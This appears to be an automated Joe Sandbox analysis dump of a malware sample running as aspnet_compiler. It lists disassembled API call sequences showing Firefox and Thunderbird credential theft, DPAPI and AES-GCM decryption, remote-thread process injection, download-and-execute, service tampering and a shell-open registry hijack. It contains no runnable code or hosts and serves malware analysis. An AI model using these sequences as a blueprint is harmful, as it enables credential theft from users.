                                                                              • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                                                              • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                                                            • CopyFileW.KERNEL32(?,?,00000000,.tmp,00000000,004176A4,\logins.json,?), ref: 0040A579
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyDispatcherExceptionFileFreeOpenPrivateProfileQueryStringTypeUserValueVirtualwsprintf
                                                                            • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 0040B87D: lstrcpyW.KERNEL32 ref: 0040B8B9
                                                                              • Part of subcall function 0040B87D: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040B8C7
                                                                              • Part of subcall function 0040B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                                                              • Part of subcall function 0040B87D: RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                                                              • Part of subcall function 0040B87D: RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                                                            • GetBinaryTypeW.KERNEL32(?,?), ref: 00409EAC
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 0040ADE3: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                                                              • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040AE1A
                                                                              • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?,nss3.dll), ref: 0040AF08
                                                                            • GetPrivateProfileStringW.KERNEL32 ref: 0040A32F
                                                                              • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5,.dll,?,00409EC5,?,00000104,00000000), ref: 0040AF64
                                                                              • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,00409EC5,?,00000104,00000000), ref: 0040AFA3
                                                                              • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFAE
                                                                              • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFB9
                                                                              • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFC4
                                                                              • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFCF
                                                                              • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B0BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad$CurrentDirectory$ExistsFilePathlstrcpylstrlen$BinaryCloseDispatcherExceptionOpenPrivateProfileQueryStringTypeUserValuelstrcat
                                                                            • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,00000000,00000000), ref: 00407B59
                                                                              • Part of subcall function 0040FB98: GetCurrentProcess.KERNEL32(0042697C,00407B45,00000000,00000000,00000000), ref: 0040FB9D
                                                                              • Part of subcall function 0040FB98: IsWow64Process.KERNEL32(00000000), ref: 0040FBA4
                                                                              • Part of subcall function 0040FB98: GetProcessHeap.KERNEL32 ref: 0040FBAA
                                                                            • GetCurrentProcess.KERNEL32 ref: 00407B6D
                                                                              • Part of subcall function 004121DC: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 004121F1
                                                                              • Part of subcall function 004121DC: GetProcAddress.KERNEL32(00000000), ref: 004121F8
                                                                            • MessageBoxA.USER32 ref: 00407C7D
                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040), ref: 00407CAD
                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407CCA
                                                                            • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407CE2
                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407D05
                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,0041E6C0,00001D44,?), ref: 00407D30
                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407D4A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$Virtual$AllocCurrentMemoryWrite$AddressCreateHandleHeapMessageModuleOpenProcProtectRemoteThreadWow64
                                                                            • String ID: Debug$Injecting64$XXXXXX
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,77C30770,00000000), ref: 00413F93
                                                                            • GetCurrentProcessId.KERNEL32 ref: 00413F9E
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF), ref: 00413FBC
                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040), ref: 00413FE6
                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,00426208,00000800,00000000), ref: 00413FFE
                                                                            • VirtualProtectEx.KERNEL32(z?A,00000000,00000800,00000040,?), ref: 0041400F
                                                                            • VirtualAllocEx.KERNEL32(?,00000000,00000103,00003000,00000004), ref: 00414026
                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,00000103,00000000), ref: 0041403C
                                                                            • CreateRemoteThread.KERNEL32(?,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0041404F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
                                                                            • String ID: z?A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D3B7
                                                                            • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0040D3CC
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D3D9
                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D3E6
                                                                            • GetLastError.KERNEL32 ref: 0040D3F0
                                                                            • Sleep.KERNEL32(000007D0), ref: 0040D402
                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D40B
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D41F
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D422
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                                                            • String ID: ServicesActive
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0040D922
                                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0040D959
                                                                              • Part of subcall function 00406045: GetProcessHeap.KERNEL32(00000008,?,004030E2,00405B80,?,?,0041191C,00405B80,?,?,77C30770,00000000,?,00405B80,00000000), ref: 00406048
                                                                              • Part of subcall function 00406045: RtlAllocateHeap.NTDLL(00000000,?,0041191C,00405B80,?,?,77C30770,00000000,?,00405B80,00000000), ref: 0040604F
                                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0040D982
                                                                            • GetLastError.KERNEL32 ref: 0040D98C
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D99A
                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0040DA5B
                                                                            • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0040DA9E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                                                            • String ID: ServicesActive
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 00407D8C
                                                                              • Part of subcall function 0040FB98: GetCurrentProcess.KERNEL32(0042697C,00407B45,00000000,00000000,00000000), ref: 0040FB9D
                                                                              • Part of subcall function 0040FB98: IsWow64Process.KERNEL32(00000000), ref: 0040FBA4
                                                                              • Part of subcall function 0040FB98: GetProcessHeap.KERNEL32 ref: 0040FBAA
                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 00407DB0
                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407DD1
                                                                            • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407DE9
                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407E13
                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407E3B
                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407E53
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
                                                                            • String ID: XXXXXX
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetFullPathNameA.KERNEL32(00426760,00000104,?,00000000), ref: 0040957C
                                                                            • PathCombineA.SHLWAPI(?,?,00418F18), ref: 0040959B
                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 004095AB
                                                                            • PathCombineA.SHLWAPI(?,00426760,0000002E), ref: 004095E2
                                                                            • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 004095F1
                                                                              • Part of subcall function 00409244: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409261
                                                                              • Part of subcall function 00409244: GetLastError.KERNEL32 ref: 0040926E
                                                                              • Part of subcall function 00409244: CloseHandle.KERNEL32(00000000), ref: 00409275
                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 00409609
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                                                            • String ID: .$Accounts\Account.rec0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D34B
                                                                            • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0040D360
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D36D
                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040D386
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D39A
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D39D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                            • String ID: ServicesActive
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004060B5
                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004060C1
                                                                            • ExitProcess.KERNEL32 ref: 004060E0
                                                                            Strings
                                                                            • USER32.DLL, xrefs: 004060B0
                                                                            • PureCall, xrefs: 004060D0
                                                                            • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 004060D5
                                                                            • MessageBoxA, xrefs: 004060BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressExitLibraryLoadProcProcess
                                                                            • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,00413187), ref: 00412E9E
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,00413187), ref: 00412EB2
                                                                            • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,00413187,?), ref: 00412EEA
                                                                            • RegCloseKey.ADVAPI32(00413187), ref: 00412EF7
                                                                            • SetLastError.KERNEL32(00000000), ref: 00412F02
                                                                            Strings
                                                                            • Software\Classes\Folder\shell\open\command, xrefs: 00412EE0
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                                                            • String ID: Software\Classes\Folder\shell\open\command
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040C1C4,?), ref: 0040C436
                                                                            • BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040C1C4,?), ref: 0040C44F
                                                                            • BCryptGenerateSymmetricKey.BCRYPT(00000020,0040C1C4,00000000,00000000,?,00000020,00000000,?,0040C1C4,?), ref: 0040C464
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
                                                                            • String ID: AES$ChainingMode$ChainingModeGCM
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                                                            • BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • LocalFree.KERNEL32(?), ref: 0040C7FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HeapLocal$AllocAllocateCryptDecryptFreeProcess
                                                                            • String ID: 0$v1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041406E
                                                                            • Process32First.KERNEL32(00000000,?), ref: 0041409B
                                                                            • Process32Next.KERNEL32 ref: 004140C2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004140CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID: explorer.exe
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,-00000001,77C2E730,?,?,?,00409D4B,00001000,?,00000000,00001000), ref: 00409DB5
                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409D4B), ref: 00409DEB
                                                                            • lstrcpyW.KERNEL32 ref: 00409E22
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                                                            • String ID: Could not decrypt
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D311,?,?,00000001), ref: 00410AE1
                                                                            • LookupAccountSidW.ADVAPI32(00000000,0040D311,?,00000104,?,00000010,?), ref: 00410B06
                                                                            • GetLastError.KERNEL32(?,?,00000001), ref: 00410B10
                                                                            • FreeSid.ADVAPI32(0040D311,?,?,00000001), ref: 00410B1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                                                            • LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                                                            • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                                                            • LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: BinaryCryptLocalString$AllocFree
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 00410CBB
                                                                              • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,77C30770), ref: 00403477
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 0040362F: PathFindExtensionW.SHLWAPI(?,?,00402969,?,?,00000000,004176A4), ref: 00403639
                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040299B
                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 004029C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                                                            • String ID: open
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000001,C0000135,0040EAD8,?,?,?,?,?,?,?,?,?,0040EC60,?,00000000,?), ref: 0040EDC7
                                                                            • NtQueryInformationProcess.NTDLL ref: 0040EDF0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$CurrentInformationQuery
                                                                            • String ID: `@
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00406099: GetProcessHeap.KERNEL32(00000000,000000F4,00411996,?,77C30770,00000000,00405B72), ref: 0040609C
                                                                              • Part of subcall function 00406099: HeapAlloc.KERNEL32(00000000), ref: 004060A3
                                                                            • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 0041157F
                                                                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 004115A6
                                                                            • GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 004115D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Drive$HeapLogicalStrings$AllocProcessType
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(?,?,?,00000000,?,0040A1B0,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 0040A8E0
                                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040A90E
                                                                              • Part of subcall function 00405FFA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 00406004
                                                                            • lstrcpyA.KERNEL32(00000000,?), ref: 0040A95B
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,00000000,?,?,?,?,?,?,?,?,0040E02E), ref: 00410B63
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 00410B74
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,?,00000000,00000000), ref: 00410BA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
                                                                            • String ID:
                                                                            • API String ID: 658607936-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?), ref: 0040C289
                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,0040C23A,?,00000000,?,?,?,?,0040C1A9), ref: 0040C2A0
                                                                            • LocalFree.KERNEL32(0040C23A,?,?,?,?,?,0040C23A,?,00000000,?,?,?,?,0040C1A9), ref: 0040C2C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocCryptDataFreeUnprotect
                                                                            • String ID:
                                                                            • API String ID: 2068576380-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,?,?), ref: 00411473
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 00411515
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
